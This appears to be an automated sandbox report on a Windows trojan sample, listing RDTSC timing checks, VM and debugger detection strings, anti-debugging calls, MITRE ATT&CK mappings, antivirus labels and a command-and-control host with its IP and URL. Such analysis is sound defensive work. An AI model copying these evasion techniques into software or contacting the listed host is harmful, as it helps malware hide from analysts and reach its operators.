Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 711028E second address: 7110292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110292 second address: 7110296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110296 second address: 711029C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 711029C second address: 71102C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F804CF71E7Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71102C3 second address: 71102C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71102C9 second address: 7110334 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 call 00007F804CF71E88h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+24h], 00000000h 0x00000017 jmp 00007F804CF71E81h 0x0000001c lock bts dword ptr [edi], 00000000h 0x00000021 jmp 00007F804CF71E7Eh 0x00000026 jc 00007F80BCD43F92h 0x0000002c jmp 00007F804CF71E80h 0x00000031 pop edi 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 mov di, ax 0x00000038 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110334 second address: 711035E instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 2C639A9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov di, ax 0x0000000c popad 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F804C8F2DA8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 711035E second address: 7110362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110362 second address: 7110368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110368 second address: 7110387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b mov ebx, eax 0x0000000d popad 0x0000000e mov esp, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110387 second address: 711038B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 711038B second address: 7110391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110391 second address: 7110396 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7110396 second address: 71103A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71103A4 second address: 71103AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 714075A second address: 7140760 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7140760 second address: 714077E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 714077E second address: 7140785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7140785 second address: 71407AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 movzx esi, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F804C8F2DA9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7140A70 second address: 7140AA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 call 00007F804CF71E7Ah 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 jmp 00007F804CF71E81h 0x00000016 push dword ptr [ebp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov esi, edx 0x0000001e push edi 0x0000001f pop ecx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7140AA2 second address: 7140B1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F804C8F2D9Eh 0x00000009 add esi, 15CEE9C8h 0x0000000f jmp 00007F804C8F2D9Bh 0x00000014 popfd 0x00000015 jmp 00007F804C8F2DA8h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push dword ptr [ebp+0Ch] 0x00000020 jmp 00007F804C8F2DA0h 0x00000025 push dword ptr [ebp+08h] 0x00000028 pushad 0x00000029 push eax 0x0000002a jmp 00007F804C8F2D9Dh 0x0000002f pop eax 0x00000030 call 00007F804C8F2DA1h 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71B0A4D second address: 71B0A62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71B0A62 second address: 71B0ABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F804C8F2D9Eh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov eax, 3337F67Dh 0x00000017 mov cx, 7D79h 0x0000001b popad 0x0000001c mov dl, byte ptr [ebp+14h] 0x0000001f jmp 00007F804C8F2DA4h 0x00000024 mov eax, dword ptr [ebp+10h] 0x00000027 pushad 0x00000028 call 00007F804C8F2D9Eh 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71B0ABE second address: 71B0B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov cx, dx 0x00000008 popad 0x00000009 and dl, 00000007h 0x0000000c jmp 00007F804CF71E83h 0x00000011 test eax, eax 0x00000013 jmp 00007F804CF71E86h 0x00000018 je 00007F80BCCC7573h 0x0000001e jmp 00007F804CF71E80h 0x00000023 sub ecx, ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push ecx 0x00000029 pop edx 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71B0B15 second address: 71B0B3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F804C8F2D9Bh 0x00000008 pop esi 0x00000009 mov bx, 6BECh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 inc ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F804C8F2D9Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A046B second address: 71A0509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F804CF71E7Eh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 call 00007F804CF71E7Eh 0x00000017 call 00007F804CF71E82h 0x0000001c pop eax 0x0000001d pop edx 0x0000001e pushad 0x0000001f movzx esi, bx 0x00000022 mov bx, 0A6Eh 0x00000026 popad 0x00000027 popad 0x00000028 push edx 0x00000029 jmp 00007F804CF71E82h 0x0000002e mov dword ptr [esp], ebx 0x00000031 pushad 0x00000032 mov si, 08CDh 0x00000036 call 00007F804CF71E7Ah 0x0000003b jmp 00007F804CF71E82h 0x00000040 pop ecx 0x00000041 popad 0x00000042 push esp 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 mov cx, bx 0x00000049 mov eax, edx 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0509 second address: 71A0524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2DA7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0524 second address: 71A0528 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0528 second address: 71A0537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: 71A0537 second address: 71A055D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, ebx 0x00000006 popad 0x00000007 mov dh, ABh 0x00000009 popad 0x0000000a mov esi, dword ptr [ebp+08h] 0x0000000d jmp 00007F804CF71E82h 0x00000012 sub ecx, ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: 71A055D second address: 71A057B instructions: 0x00000000 rdtsc 0x00000002 mov ax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F804C8F2DA5h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: 71A057B second address: 71A05AE instructions: 0x00000000 rdtsc 0x00000002 call 00007F804CF71E80h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F804CF71E88h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: 71A05AE second address: 71A05BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: 71A05BD second address: 71A05D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: 71A05D1 second address: 71A05E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: 71A05E0 second address: 71A05E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: 71A05E5 second address: 71A0689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, 00000001h 0x0000000e jmp 00007F804C8F2DA7h 0x00000013 lock cmpxchg dword ptr [esi], ecx 0x00000017 jmp 00007F804C8F2DA6h 0x0000001c mov ecx, eax 0x0000001e jmp 00007F804C8F2DA0h 0x00000023 cmp ecx, 01h 0x00000026 pushad 0x00000027 movzx eax, bx 0x0000002a push edi 0x0000002b mov ax, 5CD5h 0x0000002f pop eax 0x00000030 popad 0x00000031 jne 00007F80BC634D20h 0x00000037 pushad 0x00000038 push edx 0x00000039 jmp 00007F804C8F2D9Ah 0x0000003e pop eax 0x0000003f mov bh, E0h 0x00000041 popad 0x00000042 pop edi 0x00000043 pushad 0x00000044 push ecx 0x00000045 call 00007F804C8F2D9Bh 0x0000004a pop ecx 0x0000004b pop edi 0x0000004c popad 0x0000004d pop esi 0x0000004e jmp 00007F804C8F2DA4h 0x00000053 pop ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 push edx 0x00000058 pop eax 0x00000059 push edx 0x0000005a pop eax 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: 7160AEA second address: 7160AF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: 7160AF9 second address: 7160B11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2DA4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: 7160B11 second address: 7160B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F804CF71E87h 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F804CF71E85h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: 7160B4A second address: 7160BA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F804C8F2D9Ah 0x00000013 sub al, 00000068h 0x00000016 jmp 00007F804C8F2D9Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F804C8F2DA8h 0x00000022 add si, 9CC8h 0x00000027 jmp 00007F804C8F2D9Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: 7160BA8 second address: 7160BAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: 7160BAE second address: 7160BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Special instruction interceptor: First address: ACDB5B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Special instruction interceptor: First address: C73E97 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Special instruction interceptor: First address: ACB0F2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Special instruction interceptor: First address: C82CAC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Special instruction interceptor: First address: CF75A0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00699980 rdtsc 0_2_00699980
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe TID: 7776 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004B255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_004B255D
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004B29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004B29FF
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004B255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_004B255D
Source: Tsy9P2T9yF.exe, Tsy9P2T9yF.exe, 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Tsy9P2T9yF.exe, 00000000.00000003.1426129991.00000000069B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlS?}
Source: Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Tsy9P2T9yF.exe | Binary or memory string: Hyper-V RAW
Source: Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Tsy9P2T9yF.exe, 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Tsy9P2T9yF.exe, 00000000.00000003.1423329645.0000000001123000.00000004.00000020.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000003.1482258822.000000000117E000.00000004.00000020.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000003.1482408048.000000000117F000.00000004.00000020.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1492359367.0000000001192000.00000004.00000020.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000003.1482533819.0000000001191000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_071201B4 Start: 07120363 End: 07120307 0_2_071201B4
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_07180A0C Start: 071809DE End: 071809D8 0_2_07180A0C
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | File opened: NTICE
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | File opened: SICE
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00699980 rdtsc 0_2_00699980
Source: Tsy9P2T9yF.exe, Tsy9P2T9yF.exe, 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: >MU{Program Manager
Source: Tsy9P2T9yF.exe, 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: o>MU{Program Manager
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.11:49723 -> 147.45.113.159:80
MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the count shown next to that technique in the matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (24); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (24); Process Discovery (13); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (216)
Lateral Movement: Exploitation of Remote Services (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (11); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (2); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
Tsy9P2T9yF.exe | 61% | ReversingLabs | Win32.Trojan.Leonem
Tsy9P2T9yF.exe | 100% | Avira | TR/Crypt.TPM.Gen
Tsy9P2T9yF.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
home.twentytk20pn.top | 147.45.113.159 | true | false | | high
httpbin.org | 34.226.108.155 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322 | false | | high
https://httpbin.org/ip | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://html4/loose.dtd | Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | Tsy9P2T9yF.exe | false | | high
